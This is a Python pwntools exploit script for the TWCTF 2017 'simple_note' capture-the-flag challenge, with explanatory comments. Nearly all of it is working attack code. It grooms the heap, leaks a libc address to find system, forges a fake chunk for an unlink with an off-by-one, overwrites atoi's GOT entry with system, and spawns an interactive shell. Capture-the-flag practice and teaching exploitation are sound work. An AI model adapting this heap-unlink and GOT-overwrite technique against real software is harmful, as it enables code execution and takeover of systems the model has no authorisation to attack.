python TWCTF2017 - simple_note


from pwn import *

# =TEMPLATE FOR EXPLOITATION==================================
# Target description and tube setup. Everything below assumes a 64-bit
# Linux binary next to this script and a libc at the fixed path LIBC.
context.update(os='linux', arch='amd64', log_level='debug')
BINARY = 'simple_note'
LIBC = '/lib/x86_64-linux-gnu/libc.so.6'
# Remote endpoint: unset in this template (remote() is only reached with argv[1] == 'r').
R_HOST, R_PORT = None, None
# Local endpoint: defined but not referenced anywhere else in this script.
L_HOST, L_PORT = 'localhost', 4444
elf = ELF(BINARY)
libc = ELF(LIBC)
# The tube talking to the target; chosen below from sys.argv[1].
s = None

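# Pick the tube from the first CLI argument:
#   'r' -> connect to R_HOST:R_PORT (both None in this template)
#   'd' -> local process with gdb attached, running the 'gdbrc' script
#   'l' / anything else -> plain local process
# The local process is started with LIBC preloaded so the offsets used
# later refer to that exact libc build.
mode = sys.argv[1] if len(sys.argv) > 1 else None
if mode == 'r':
    s = remote(R_HOST, R_PORT)
else:
    s = process([BINARY], env={'LD_PRELOAD': LIBC})
    if mode == 'd':
        # Read the gdb script and close the file; the original left the
        # handle open for the life of the script.
        with open('gdbrc', 'r') as f:
            gdbscript = f.read()
        # Give the process a moment to appear before looking up its pid.
        time.sleep(0.5)
        pid = proc.pid_by_name(BINARY)
        # pid_by_name returns a list; an empty list (process already gone)
        # raises IndexError here, as before.
        gdb.attach(pid[0], gdbscript)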

# =FUNCTIONS FOR EXPLOITATION=================================
def add(size, data):
    """Menu option 1: allocate a note of ``size`` bytes and write ``data``.

    ``data`` is sent with ``send`` rather than ``sendline``, so no newline
    is appended; the caller controls the exact bytes delivered.
    """
    dialogue = (
        ('Your choice: \n', '1'),
        ('Please input the size: \n', str(size)),
    )
    for prompt, reply in dialogue:
        s.recvuntil(prompt)
        s.sendline(reply)
    s.recvuntil('Please input your note: \n')
    s.send(data)

def delete(idx):
    """Menu option 2: free the note stored at index ``idx``."""
    dialogue = (
        ('Your choice: \n', '2'),
        ('Please input the index: \n', str(idx)),
    )
    for prompt, reply in dialogue:
        s.recvuntil(prompt)
        s.sendline(reply)

def show(idx):
    """Menu option 3: print note ``idx`` and return one line of its output.

    The first line the program prints after the index is discarded
    (presumably a label line — confirm against the binary's output); the
    second line is returned verbatim, trailing newline included.
    """
    dialogue = (
        ('Your choice: \n', '3'),
        ('Please input the index: \n', str(idx)),
    )
    for prompt, reply in dialogue:
        s.recvuntil(prompt)
        s.sendline(reply)
    _discarded = s.readline()
    note_line = s.readline()
    return note_line

def edit(idx, data):
    """Menu option 4: overwrite note ``idx`` with ``data``.

    Unlike ``add``, the payload goes through ``sendline``, so a newline
    follows ``data`` on the wire.
    """
    dialogue = (
        ('Your choice: \n', '4'),
        ('Please input the index: \n', str(idx)),
        ('Please input your note: \n', data),
    )
    for prompt, reply in dialogue:
        s.recvuntil(prompt)
        s.sendline(reply)

def system_calc(leaked_addr):
    """Turn a leaked libc pointer into the runtime address of ``system``.

    The leak is assumed to lie exactly 0x3c4b78 bytes above the libc base.
    That distance is specific to the libc build this script was written
    against (the one at LIBC); it must be re-derived for any other build,
    otherwise the result is simply wrong.
    """
    leak_delta = 0x3c4b78
    base = leaked_addr - leak_delta
    system_off = libc.functions['system'].address
    return base + system_off

# =VARIABLES FOR EXPLOITATION=================================
# Address where the program keeps the pointer to note 3 (taken from the
# write-up; presumably a fixed, non-PIE data address — verify against the
# binary before reuse).
chunk3_ptr = 0x6020d8

# Payload written into note 3: a fake chunk header (prev_size, size, fd, bk)
# followed by padding, a size field and one trailing byte. Total length is
# 0x89 bytes, one more than the note's 0x88-byte allocation.
fake_chunk = [
    p64(0),
    p64(0x80),
    p64(chunk3_ptr - 8*3),
    p64(chunk3_ptr - 8*2),
]
header_len = sum(len(part) for part in fake_chunk)
fake_chunk.append('A' * (0x88 - header_len - 8))
fake_chunk.append(p64(0x80))
fake_chunk.append('\x90')
buf = ''.join(fake_chunk)

# =EXPLOITATION===============================================
# Heap setup: five notes of 0x88 bytes. The fourth one (index 3) is filled
# completely; the author's comment on that line explains why.
for _ in range(3):
    add(0x88, 'a'*8)
add(0x88, 'A'*0x88) #fill for strlen off-by-one error
add(0x88, 'a'*8)

#information leak
# Free note 0, reallocate it with a short write, then read it back: the
# bytes after the first 8 are interpreted as a libc pointer.
delete(0)
add(0x88, 'a'*8)
leak_line = show(0)[:-1]                              # drop trailing newline
leaked_addr = u64(leak_line[8:].ljust(8, '\x00'))
system_addr = system_calc(leaked_addr)

#create fake chunk
# Write the prepared header into note 3, then free its neighbour (note 4).
edit(3, buf)
delete(4)

#got overwrite
# Note 3 now points into the note table; redirect it at atoi's GOT slot
# and write system's address there through note 0.
edit(3, p64(elf.got['atoi']))
edit(0, p64(system_addr))

# The next menu read goes through atoi, which now resolves to system.
s.recvuntil('Your choice: \n')
s.sendline('/bin/sh')
s.recv()
s.interactive()
